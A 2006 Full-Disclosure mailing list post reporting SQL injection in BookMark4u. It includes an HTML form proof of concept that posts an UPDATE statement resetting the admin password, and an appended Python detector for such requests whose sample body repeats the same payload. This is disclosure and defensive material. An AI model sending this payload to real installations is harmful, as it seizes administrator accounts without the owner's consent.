List: full-disclosure
Subject: [Full-disclosure] Sql Injection in BookMark4u
From: "(M.o.H.a.J.a.L.i)" <mohajali2k4 () gmail ! com>
Date: 2006-04-20 16:46:43
Message-ID: 470c3dd0604200946m668e0b6aq3135032d65520002 () mail ! gmail ! com
site:
http://bookmark4u.sourceforge.net/
Hello, I found a vulnerability in BookMark4u that you can use to make SQL
injections...
The following PoC changes the admin password:
[code]
<form action='http://bookmark4u.sourceforge.net/v2.0.0/admin/config.php'
method='post'>
<tr><td align='center'>
<input type='hidden' name='sqlcmd' value="# add a administrator
(initial password
is 'test') %NL%UPDATE bk4u_passwd SET passwd=PASSWORD('asdfg') WHERE
user='admin';">
<input type='hidden' name='mode' value='sqlexec'>
<input type='submit' value="Execute Above (administrator's account)">
</td></tr>
</form></table>
<br><a href='javascript:document.location.reload();'>And Reload this
page</a>.</body></html>
[/code]
MoHaJaLi
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
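
Added example, not part of the original post and not BookMark4u code: a defender-side check for request captures (WAF or reverse-proxy logs that record POST bodies) that flags form posts shaped like the PoC above, that is, `mode=sqlexec` with a `sqlcmd` field sent to `admin/config.php`. The function names, the finding format, the reading of `%NL%` as a line separator and the sample request bodies are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qs, urlencode, urlsplit

# SQL verbs that change data or schema (assumed triage list, not exhaustive).
WRITE_VERBS = {"UPDATE", "INSERT", "DELETE", "REPLACE", "DROP", "ALTER",
               "CREATE", "GRANT", "TRUNCATE"}

def statements(sqlcmd):
    """Split a sqlcmd value into statements, skipping '#' comment lines.
    Assumption: %NL% marks a line break, as its use in the PoC suggests.
    Splitting on ';' is naive (quoted semicolons), which is fine for triage."""
    lines = [l.strip() for l in re.split(r"%NL%|\r?\n", sqlcmd)]
    sql = " ".join(l for l in lines if l and not l.startswith("#"))
    return [s.strip() for s in sql.split(";") if s.strip()]

def inspect_post(url_path, body):
    """Return a finding for a form-encoded POST body, or None if no match."""
    if not urlsplit(url_path).path.lower().endswith("/admin/config.php"):
        return None
    form = parse_qs(body, keep_blank_values=True)
    if form.get("mode", [""])[0].lower() != "sqlexec" or "sqlcmd" not in form:
        return None
    stmts = statements(form["sqlcmd"][0])
    verbs = [s.split(None, 1)[0].upper() for s in stmts]
    writes = any(v in WRITE_VERBS for v in verbs)
    return {
        "path": url_path,
        "verbs": verbs,
        # bk4u_passwd is the credential table named in the PoC.
        "credential_table": any("bk4u_passwd" in s.lower() for s in stmts),
        "severity": "high" if writes else "medium",
    }

# Constructed sample bodies: the first mirrors the form fields in the post.
POC_BODY = urlencode({
    "sqlcmd": "# add a administrator (initial password is 'test') %NL%"
              "UPDATE bk4u_passwd SET passwd=PASSWORD('asdfg') WHERE user='admin';",
    "mode": "sqlexec",
})
READ_BODY = urlencode({"sqlcmd": "SELECT 1", "mode": "sqlexec"})
BENIGN_BODY = urlencode({"mode": "save", "title": "my links"})

if __name__ == "__main__":
    for body in (POC_BODY, READ_BODY, BENIGN_BODY):
        print(inspect_post("/v2.0.0/admin/config.php", body))
```

Any hit is worth reviewing regardless of severity, since the endpoint is accepting SQL text from the request; the severity field only separates state-changing statements from read-only ones.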